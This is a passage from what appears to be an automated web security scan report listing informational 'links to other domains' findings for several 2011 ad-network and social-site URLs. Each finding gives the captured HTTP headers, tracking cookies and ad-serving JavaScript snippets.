Set-Cookie:PRcp=|AK6uAA67:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FgaP:2|FgaO:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GRww:2|GRmI:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FgaPGRww:2|FgaOGRmI:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...
</style><a target='_blank' href='http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/a;243851526;0-0;0;67592558;2321-160/600;43168466/43186253/1;u=,cm-10109720508_1311273739,11fda490648f83c,games,ax.80-cm.games_h-bz.25;~okv=;net=cm;u=,cm-10109720508_1311273739,11fda490648f83c,games,ax.80-cm.games_h-bz.25;;cmw=owl;sz=160x600;net=cm;ord1=141338;contx=games;an=80;dc=w;btg=cm.games_h;btg=bz.25;~aopt=2/1/e4/0;~sscs=?http://clk.pointroll.com/bc/?a=1498970&c=1&i=98A80400-D9B5-CC6F-1309-E200007B0101&clickurl=http://ad.doubleclick.net/clk%3B243026625%3B67407714%3Bf%3Bpc=[TPAS_ID]%3Fhttp://www.ford.com/?referrer=FDAF-BannerAd%26bannerid=515935%7C67407714%7C243026625'><img border=0 width='160' height='600' style='width:160px;height:600px' src='http://speed.pointroll.com/PointRoll/Media/Panels/Ford/724287/FDAF_2011_Shared_160x600_Default.jpg?PRAd=1498970&PRCID=149897
...[SNIP]...

18.40. http://ads.pointroll.com/PortalServe/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.pointroll.com
Path:	/PortalServe/

Issue detail

The page was loaded from a URL containing a query string:

http://ads.pointroll.com/PortalServe/?pid=1201394B20320110131185648&flash=10&time=6|8:19|-5&redir=http://oascentral.discovery.com/RealMedia/ads/click_lx.ads/www.treehugger.com/travel_nature/L32/1097750089/TopLeft/DCI/5916_Flight_2_2011_Ba_815603810/2011.0201_Montana5916_DCI_Target_B2032_pr728.html/7263485738303471796b67414345734b?$CTURL$&r=0.7195214205421507

The response contains the following link to another domain:

http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab

Request

GET /PortalServe/?pid=1201394B20320110131185648&flash=10&time=6|8:19|-5&redir=http://oascentral.discovery.com/RealMedia/ads/click_lx.ads/www.treehugger.com/travel_nature/L32/1097750089/TopLeft/DCI/5916_Flight_2_2011_Ba_815603810/2011.0201_Montana5916_DCI_Target_B2032_pr728.html/7263485738303471796b67414345734b?$CTURL$&r=0.7195214205421507 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://www.treehugger.com/travel_nature/?campaign=th_nav_travel
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=075575AC-65DD-4BD6-BEE2-9CADDD88EAC7; PRbu=Eo1TOtJ24; PRvt=CEJozEpiencOrSADIBBeJwvEpZYTFEeMAI_BAeJdXEpiZ_xsvXAAhBDeJWuEpnUn50X3AAFBBe; PRgo=BBBAAuILBBVCFUE6; PRimp=CBA70400-3E9E-6299-0209-A6B000CA0100; PRca=|AKRb*34775:2|AJvh*396:1|AJyC*1646:1|AK3y*423:7|AKEt*6961:1|AJfR*19:1|AKYt*1093:1|AKRf*443:19|AKTh*396:3|AKKy*396:1|AKZ2*74:1|AKWd*1774:1|AKVe*981:1|AKQh*130:29|AKVX*396:1|AKTY*34573:2|AKKi*16228:2|AKAt*1646:2|#; PRcp=|AKRbAJCt:2|AJvhAAGY:1|AJyCAA08:1|AK3yAAGp:7|AKQhAAGY:1|AKEtABoR:1|AJfRAAAT:1|AKYtAARd:1|AKRfAAHJ:19|AKThAAGY:3|AKKyAAGY:1|AKZ2AABM:1|AKQhAGKI:5|AKWdAA2c:1|AKVeAAPp:1|AKQhAACG:23|AKVXAAGY:1|AKTYAIzd:2|AKKiAENk:2|AKAtAA08:2|#; PRpl=|FdgM:2|FFZV:1|FADR:1|FaVQ:7|FYoG:1|FX38:2|FP53:1|EzNM:1|F5NJ:1|F9VY:19|FX36:1|F2V4:1|FYoZ:2|FYo0:2|F5QS:1|FYoV:1|F10u:1|F2ym:1|FYnn:5|FYnm:11|FYnl:7|FY5B:1|F0tY:1|F0tZ:1|FQvS:2|FB4h:2|#; PRcr=|GK92:2|GCe3:1|GBLt:1|GQI7:7|GMER:1|GLnv:2|GKRx:1|GME7:1|GMb9:1|GOLI:1|GKRu:19|GLnt:1|GMuF:1|GK5Q:1|GOWw:1|GMWF:1|GNEj:1|GMEm:1|GK5V:2|GK5Z:2|GK5W:1|GMEn:2|GMEb:1|GMEa:2|GK5Y:3|GK5P:2|GMEZ:10|GMFk:1|GMyK:1|GMSZ:1|GKiO:2|GBnW:2|#; PRpc=|FdgMGK92:2|FFZVGCe3:1|FADRGBLt:1|FaVQGQI7:7|FYoGGMER:1|FX38GLnv:2|FP53GKRx:1|FYnmGME7:1|EzNMGMb9:1|F5NJGOLI:1|F9VYGKRu:19|FX36GLnt:1|F2V4GMuF:1|FYo0GK5Q:1|FYoZGMEZ:2|FYo0GK5Z:1|F5QSGOWw:1|FYoVGMEZ:1|F10uGMWF:1|F2ymGNEj:1|FYnmGMEm:1|FYnmGK5V:2|FYnnGK5Z:1|FYnnGK5W:1|FYnnGMEn:2|FYnnGMEb:1|FYnmGMEa:2|FYnmGK5Y:3|FYnmGK5P:2|FYnlGMEZ:7|FY5BGMFk:1|F0tYGMyK:1|F0tZGMSZ:1|FQvSGKiO:2|FB4hGBnW:2|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 23 Jul 2011 13:19:44 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache
Content-type: text/html
Content-length: 16344
Set-Cookie:PRgo=BBBAAuILBBVCFUE6;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=BCA80400-746F-3AAB-0209-6C3000FD0100; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKC5*112:1|AKRb*34775:2|AJvh*396:1|AJyC*1646:1|AK3y*423:7|AKEt*6961:1|AJfR*19:1|AKYt*1093:1|AKRf*443:19|AKTh*396:3|AKKy*396:1|AKZ2*74:1|AKWd*1774:1|AKVe*981:1|AKQh*130:29|AKVX*396:1|AKTY*34573:2|AKKi*16228:2|AKAt*1646:2|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKC5AABo:1|AKRbAJCt:2|AJvhAAGY:1|AJyCAA08:1|AK3yAAGp:7|AKQhAAGY:1|AKEtABoR:1|AJfRAAAT:1|AKYtAARd:1|AKRfAAHJ:19|AKThAAGY:3|AKKyAAGY:1|AKZ2AABM:1|AKQhAGKI:5|AKWdAA2c:1|AKVeAAPp:1|AKQhAACG:23|AKVXAAGY:1|AKTYAIzd:2|AKKiAENk:2|AKAtAA08:2|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FC7U:1|FdgM:2|FFZV:1|FADR:1|FaVQ:7|FYoG:1|FX38:2|FP53:1|EzNM:1|F5NJ:1|F9VY:19|FX36:1|F2V4:1|FYoZ:2|FYo0:2|F5QS:1|FYoV:1|F10u:1|F2ym:1|FYnn:5|FYnm:11|FYnl:7|FY5B:1|F0tY:1|F0tZ:1|FQvS:2|FB4h:2|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GCYY:1|GK92:2|GCe3:1|GBLt:1|GQI7:7|GMER:1|GLnv:2|GKRx:1|GME7:1|GMb9:1|GOLI:1|GKRu:19|GLnt:1|GMuF:1|GK5Q:1|GOWw:1|GMWF:1|GNEj:1|GMEm:1|GK5V:2|GK5Z:2|GK5W:1|GMEn:2|GMEb:1|GMEa:2|GK5Y:3|GK5P:2|GMEZ:10|GMFk:1|GMyK:1|GMSZ:1|GKiO:2|GBnW:2|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FC7UGCYY:1|FdgMGK92:2|FFZVGCe3:1|FADRGBLt:1|FaVQGQI7:7|FYoGGMER:1|FX38GLnv:2|FP53GKRx:1|FYnmGME7:1|EzNMGMb9:1|F5NJGOLI:1|F9VYGKRu:19|FX36GLnt:1|F2V4GMuF:1|FYo0GK5Q:1|FYoZGMEZ:2|FYo0GK5Z:1|F5QSGOWw:1|FYoVGMEZ:1|F10uGMWF:1|F2ymGNEj:1|FYnmGMEm:1|FYnmGK5V:2|FYnnGK5Z:1|FYnnGK5W:1|FYnnGMEn:2|FYnnGMEb:1|FYnmGMEa:2|FYnmGK5Y:3|FYnmGK5P:2|FYnlGMEZ:7|FY5BGMFk:1|F0tYGMyK:1|F0tZGMSZ:1|FQvSGKiO:2|FB4hGBnW:2|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...
6C3000FD0100' onMouseOver=\"if(typeof(prRoll)=='function')prBOver('BCA80400746F3AAB02096C3000FD0100');\" onMouseOut=\"if(typeof(prRoll)=='function')prBOut(event);\" style='position:absolute;z-index:1'><object id='prflsBCA80400746F3AAB02096C3000FD0100' name='prflsBCA80400746F3AAB02096C3000FD0100' classid=clsid:D27CDB6E-AE6D-11cf-96B8-444553540000 codebase=http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0 width='728' height='90' style='width:728px;height:90px'><param name='movie' value='http://speed.pointroll.com/PointRoll/Media/Banners/TravelMontana/840321/mtot_conrad_x_728x90_Bnr_r03.swf?PRCampID=38595&PRPubID=discover&PRAdSize=728x90&PRFormat=EX&PRAd=1439
...[SNIP]...

18.41. http://ads.pointroll.com/PortalServe/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.pointroll.com
Path:	/PortalServe/

Issue detail

The page was loaded from a URL containing a query string:

http://ads.pointroll.com/PortalServe/?pid=1355334U75720110715143929&flash=0&time=4|13:1|-5&redir=http://ad.doubleclick.net/click%3Bh%3Dv8/3b4b/3/0/%2a/q%3B243851531%3B0-0%3B0%3B67592558%3B4307-300/250%3B43168483/43186270/1%3Bu%3D%2Ccm-10306552516_1311271251%2C11fda490648f83c%2Cgames%2Cax.80-bz.25%3B%7Eokv%3D%3Bnet%3Dcm%3Bu%3D%2Ccm-10306552516_1311271251%2C11fda490648f83c%2Cgames%2Cax.80-bz.25%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Bord1%3D218732%3Bcontx%3Dgames%3Ban%3D80%3Bdc%3Dw%3Bbtg%3Dbz.25%3B%7Eaopt%3D2/1/e4/0%3B%7Esscs%3D%3f$CTURL$&r=0.5124368451783178

The response contains the following link to another domain:

http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/q;243851531;0-0;0;67592558;4307-300/250;43168483/43186270/1;u=,cm-10306552516_1311271251,11fda490648f83c,games,ax.80-bz.25;~okv=;net=cm;u=,cm-10306552516_1311271251,11fda490648f83c,games,ax.80-bz.25;;cmw=owl;sz=300x250;net=cm;ord1=218732;contx=games;an=80;dc=w;btg=bz.25;~aopt=2/1/e4/0;~sscs=?http://clk.pointroll.com/bc/?a=1498300&c=1&i=98A80400-8221-F690-1309-E200007E0101&clickurl=http://ad.doubleclick.net/clk%3B243026625%3B67407713%3Be%3Bpc=[TPAS_ID]%3Fhttp://www.ford.com/?referrer=FDAF-BannerAd%26bannerid=515935%7C67407713%7C243026625

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Jul 2011 18:00:57 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache
Content-type: text/html
Content-length: 3207
Set-Cookie:PRvt=CBJ4gEqJghgpD2!B_BBe;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRgo=BBBAAuILBBVCFUE6;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=98A80400-8221-F690-1309-E200007E0101; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AK6u*2017:2|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AK6uAA67:2|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FgaO:2|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GRmI:2|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FgaOGRmI:2|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...
</style><a target='_blank' href='http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/q;243851531;0-0;0;67592558;4307-300/250;43168483/43186270/1;u=,cm-10306552516_1311271251,11fda490648f83c,games,ax.80-bz.25;~okv=;net=cm;u=,cm-10306552516_1311271251,11fda490648f83c,games,ax.80-bz.25;;cmw=owl;sz=300x250;net=cm;ord1=218732;contx=games;an=80;dc=w;btg=bz.25;~aopt=2/1/e4/0;~sscs=?http://clk.pointroll.com/bc/?a=1498300&c=1&i=98A80400-8221-F690-1309-E200007E0101&clickurl=http://ad.doubleclick.net/clk%3B243026625%3B67407713%3Be%3Bpc=[TPAS_ID]%3Fhttp://www.ford.com/?referrer=FDAF-BannerAd%26bannerid=515935%7C67407713%7C243026625'><img border=0 width='300' height='250' style='width:300px;height:250px' src='http://speed.pointroll.com/PointRoll/Media/Panels/Ford/724287/FDAF_2011_Shared_300x250_Default.jpg?PRAd=1498300&PRCID=149830
...[SNIP]...

18.42. http://adserver.adtechus.com/addyn/3.0/5259.1/1248404/0/225/ADTECH previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://adserver.adtechus.com
Path:	/addyn/3.0/5259.1/1248404/0/225/ADTECH

Issue detail

The page was loaded from a URL containing a query string:

http://adserver.adtechus.com/addyn/3.0/5259.1/1248404/0/225/ADTECH;loc=100;target=_blank;grp=955;key=game=wow+group=projects+page=projects_viewprojectpost+site=wow+lang=en;misc=1311396517002

The response contains the following link to another domain:

http://ad.doubleclick.net/ad/N3493.curse.com/B5634601.2;sz=1x1;pc=[TPAS_ID];ord=[timestamp]?

Request

GET /addyn/3.0/5259.1/1248404/0/225/ADTECH;loc=100;target=_blank;grp=955;key=game=wow+group=projects+page=projects_viewprojectpost+site=wow+lang=en;misc=1311396517002 HTTP/1.1
Host: adserver.adtechus.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://wow.curse.com/downloads/wow-addons/details/rawr-official.aspx
Cookie: CfP=1; JEB2=4E2A47706E651A230C6EAF39F0010144

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Type: application/x-javascript
Content-Length: 15759

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
= function(str) {
       __ADTECH_CODE__ += str;
   };

   document.writeln = function(str) { document.write(str + "\n"); };

   __theDocument = parent.document;
   __theWindow = parent;
}
document.write("<img src='http://ad.doubleclick.net/ad/N3493.curse.com/B5634601.2;sz=1x1;pc=[TPAS_ID];ord=[timestamp]?' style='display:none;' /> \n");
document.write("            \n");
document.write(" \n");
document.write("        <style type=\"text/css\">
...[SNIP]...

18.43. http://assets.0.mybcdna.com/JavaScript/apps/HomeBeforeLogin/hblv2.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://assets.0.mybcdna.com
Path:	/JavaScript/apps/HomeBeforeLogin/hblv2.js

Issue detail

The page was loaded from a URL containing a query string:

http://assets.0.mybcdna.com/JavaScript/apps/HomeBeforeLogin/hblv2.js?68769

The response contains the following links to other domains:

http://api.recaptcha.net/img/clean/audio.png
http://api.recaptcha.net/img/clean/help.png
http://api.recaptcha.net/img/clean/refresh.png
http://api.recaptcha.net/img/clean/text.png
http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
http://games.myyearbook.com/landing/'+feedData.gamesFeedItems[y].game_name+'
http://recaptcha.net/popuphelp/
http://tv.myyearbook.com/series/'+feedData.tvFeedItems[y].series_id+'
http://tv.myyearbook.com/view/'+feedData.tvFeedItems[y].episode_id+'
https://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab
https://h.online-metrix.net/fp/check.js?org_id=u8fxw6sf&session_id=' + threatMetrixSessionId + '
https://h.online-metrix.net/fp/clear.png?org_id=u8fxw6sf&session_id=' + threatMetrixSessionId + '&m=2
https://h.online-metrix.net/fp/fp.swf?org_id=u8fxw6sf&session_id=' + threatMetrixSessionId + '

Request

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Last-Modified: Thu, 16 Jun 2011 15:10:15 GMT
ETag: "2230425394"
Content-Type: text/javascript
Accept-Ranges: bytes
Content-Length: 274737
Date: Thu, 21 Jul 2011 17:58:28 GMT
Server: lighttpd/1.4.19
X-MyPoolMember: 10.10.10.240
Cache-Control: private, max-age=1800
Age: 0
Expires: Thu, 21 Jul 2011 18:28:28 GMT
X-CDN: Cotendo
Connection: Keep-Alive

/*
* jQuery JavaScript Library v1.3.2
* http://jquery.com/
*
* Copyright (c) 2009 John Resig
* Dual licensed under the MIT and GPL licenses.
* http://docs.jquery.com/License
*
* Date: 2009-02-
...[SNIP]...
</div><object id="giftFlash" height="360" width="640" name="giftFlash" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,0,0" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"><param value="'+swfPath+'" name="movie"/>
...[SNIP]...
</p><img src="https://h.online-metrix.net/fp/clear.png?org_id=u8fxw6sf&session_id=' + threatMetrixSessionId + '&m=2"alt=""><script src="https://h.online-metrix.net/fp/check.js?org_id=u8fxw6sf&session_id=' + threatMetrixSessionId + '"type="text/javascript"></script><object type="application/x-shockwave-flash"data="https://h.online-metrix.net/fp/fp.swf?org_id=u8fxw6sf&session_id=' + threatMetrixSessionId + '"width="1"height="1"id="obj_id"><param name="movie"value="https://h.online-metrix.net/fp/fp.swf?org_id=u8fxw6sf&session_id=' + threatMetrixSessionId + '"/>
...[SNIP]...
</strong>'}h+=' in <a href="http://games.myyearbook.com/landing/'+feedData.gamesFeedItems[y].game_name+'">';h+=feedData.gamesFeedItems[y].game_display_name;h+='</a>
...[SNIP]...
</div>';h+='<a href="http://games.myyearbook.com/landing/'+feedData.gamesFeedItems[y].game_name+'">';h+='<img src="'+imageURL('images/games/tiles/'+feedData.gamesFeedItems[y].game_id+'_'+'medium.gif')+'" ';h+='class="game_thumb" alt="'+feedData.gamesFeedItems[y].game_display_name+'" />
...[SNIP]...
</a>';h+=' watched ';h+='<a href="http://tv.myyearbook.com/series/'+feedData.tvFeedItems[y].series_id+'">';h+=feedData.tvFeedItems[y].series_title;h+='</a>';h+=' - ';h+='<a href="http://tv.myyearbook.com/view/'+feedData.tvFeedItems[y].episode_id+'">';h+=feedData.tvFeedItems[y].episode_title;h+='</a>
...[SNIP]...
<br />';h+='<a href="http://tv.myyearbook.com/view/'+feedData.tvFeedItems[y].episode_id+'">';h+='<img src="'+feedData.tvFeedItems[y].thumb_url;h+='" class="tv_thumb" alt="'+feedData.tvFeedItems[y].episode_title+'" />
...[SNIP]...
<a tabindex="-1" id="recaptcha_reload_btn" href="javascript:Recaptcha.reload ();" title="Get a new challenge"><img width="25" height="18" alt="Get a new challenge" id="recaptcha_reload" src="http://api.recaptcha.net/img/clean/refresh.png"/></a><a class="recaptcha_only_if_image" tabindex="-1" id="recaptcha_switch_audio_btn" href="javascript:Recaptcha.switch_type(\'audio\');" title="Get an audio challenge"><img width="25" height="15" alt="Get an audio challenge" id="recaptcha_switch_audio" src="http://api.recaptcha.net/img/clean/audio.png"/></a><a class="recaptcha_only_if_audio" tabindex="-1" id="recaptcha_switch_img_btn" href="javascript:Recaptcha.switch_type(\'image\');" title="Get a visual challenge"><img width="25" height="15" alt="Get a visual challenge" id="recaptcha_switch_img" src="http://api.recaptcha.net/img/clean/text.png"/></a><a tabindex="-1" id="recaptcha_whatsthis_btn" href="http://recaptcha.net/popuphelp/" target="_1" title="Help"><img width="25" height="16" id="recaptcha_whatsthis" src="http://api.recaptcha.net/img/clean/help.png" alt="Help"/></a>
...[SNIP]...
rl=S.server+"image?c="+S.challenge;if(httpwavurl.indexOf("https://")==0){httpwavurl="http://"+httpwavurl.substring(8)}var swfUrl=S.server+"/img/audiocaptcha.swf?v2";var embedCode;if(C._2()){embedCode='<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="audiocaptcha" width="0" height="0" codebase="https://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab"><param name="movie" value="'+swfUrl+'" />
...[SNIP]...

18.44. http://assets.mybcdna.com/JavaScript/apps/site.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://assets.mybcdna.com
Path:	/JavaScript/apps/site.js

Issue detail

The page was loaded from a URL containing a query string:

http://assets.mybcdna.com/JavaScript/apps/site.js?68769

The response contains the following link to another domain:

http://pixel.33across.com/ps/'+Math.ceil(1e6*Math.random())+'/?pid=112&uid='+obj.data.sender+'&gnd='+obj.data.senderGender+'&age='+obj.data.senderAge+'&zp='+obj.data.senderZipCode+'&f='+obj.data.receiver+'&gnd2='+obj.data.receiverGender+'&age2='+obj.data.receiverAge+'&zp2='+obj.data.receiverZipCode+'&tt=iframe

Request

GET /JavaScript/apps/site.js?68769 HTTP/1.1
Host: assets.mybcdna.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Last-Modified: Thu, 18 Nov 2010 19:54:51 GMT
ETag: "3447361013"
Content-Type: text/javascript
Accept-Ranges: bytes
Content-Length: 5001
Date: Thu, 21 Jul 2011 18:00:20 GMT
Server: lighttpd/1.4.19
Cache-Control: private, max-age=1800
Age: 0
Expires: Thu, 21 Jul 2011 18:30:20 GMT
X-CDN: Cotendo
Connection: Keep-Alive

$(document).ready(function(){var qsText=$('#quickSearchBox').val();var qsColor=$('#quickSearchBox').css('color');$('#quickSearchBox').click(function(){var val=$.trim($(this).val());if(val==qsText){$(t
...[SNIP]...
st:function(receiverUserId){$.ajax({url:SITE_URL+'apps/ads/thirdparty/thirtyThreeAcross/'+receiverUserId+'/',type:'get',dataType:'jsonp'})},sendData:function(obj){if(obj&&!obj.error){$('body').append('<iframe style="display:none;width:1px;height:1px;" src="http://pixel.33across.com/ps/'+Math.ceil(1e6*Math.random())+'/?pid=112&uid='+obj.data.sender+'&gnd='+obj.data.senderGender+'&age='+obj.data.senderAge+'&zp='+obj.data.senderZipCode+'&f='+obj.data.receiver+'&gnd2='+obj.data.receiverGender+'&age2='+obj.data.receiverAge+'&zp2='+obj.data.receiverZipCode+'&tt=iframe"</iframe>')}}}};if(top.location!=self.location){top.location=self.location.href}

18.45. http://assets.tumblr.com/iframe.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://assets.tumblr.com
Path:	/iframe.html

Issue detail

The page was loaded from a URL containing a query string:

http://assets.tumblr.com/iframe.html?9&src=http%3A%2F%2Fkeepitfresh.frid.ge%2F&lang=en_US&name=keepitfresher

The response contains the following link to another domain:

http://www.google-analytics.com/ga.js

Request

GET /iframe.html?9&src=http%3A%2F%2Fkeepitfresh.frid.ge%2F&lang=en_US&name=keepitfresher HTTP/1.1
Host: assets.tumblr.com
Proxy-Connection: keep-alive
Referer: http://keepitfresh.frid.ge/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: text/html
Last-Modified: Fri, 15 Apr 2011 22:13:30 GMT
Accept-Ranges: bytes
X-Varnish: 1572503119
Vary: Accept-Encoding
Content-Length: 3765
Cache-Control: max-age=2483665
Expires: Sat, 20 Aug 2011 14:53:50 GMT
Date: Fri, 22 Jul 2011 20:59:25 GMT
Connection: close

<!DOCTYPE html>
<html>
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
    <meta http-equiv="x-dns-prefetch-control" content="off"/>
    <link rel="icon" href="http://assets.tumblr.com/images/favicon.gif?2" type="image/gif"/>

    <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...

18.46. http://bs.serving-sys.com/BurstingPipe/adServer.bs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/adServer.bs

Issue detail

The page was loaded from a URL containing a query string:

http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2711514&PluID=0&w=728&h=90&ord=1311271292&ucm=true&ncu=$$http://ib.adnxs.com/click?UrgehetR4D9SuB6F61HgPwAAAKCZmQVAmpmZmZmZBUCamZmZmZkFQBsceZa4RtQh_________398aShOAAAAAPknAAC1AAAAbAEAAAIAAAAAPgcA0WMAAAEAAABVU0QAVVNEANgCWgC4Ck8AiQQBAQUCAQQAAAAAYibxlAAAAAA./cnd=!6QTzJwjfggYQgPwcGNHHASAA/referrer=http%3A%2F%2Fgames.myyearbook.com%2F/clickenc=http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBi87SfGkoTpWTLOX1lQev7PBwwMbU9wH4uJ-PG8Cv6u9EABABGAEgADgBUIDH4cQEYMnW8obIo_waggEXY2EtcHViLTczMDY5MTk3MjM4Mjc3NjWyARRnYW1lcy5teXllYXJib29rLmNvbboBCTcyOHg5MF9hc8gBCdoBHGh0dHA6Ly9nYW1lcy5teXllYXJib29rLmNvbS-YAv4DwAIEyAKoqKQZ4AIA6gIXTVlCXzcyOHg5MF9HYW1lc19Ib21lXzKoAwHoAwjoAyfoA54H9QMAAIBM4AQBgAa4raSoqt7Y4JcB%26num%3D1%26sig%3DAOD64_0HV9CyXXRXmldNeY-MsDj6zKvo0g%26client%3Dca-pub-7306919723827765%26adurl%3D$$&apui=1

The response contains the following link to another domain:

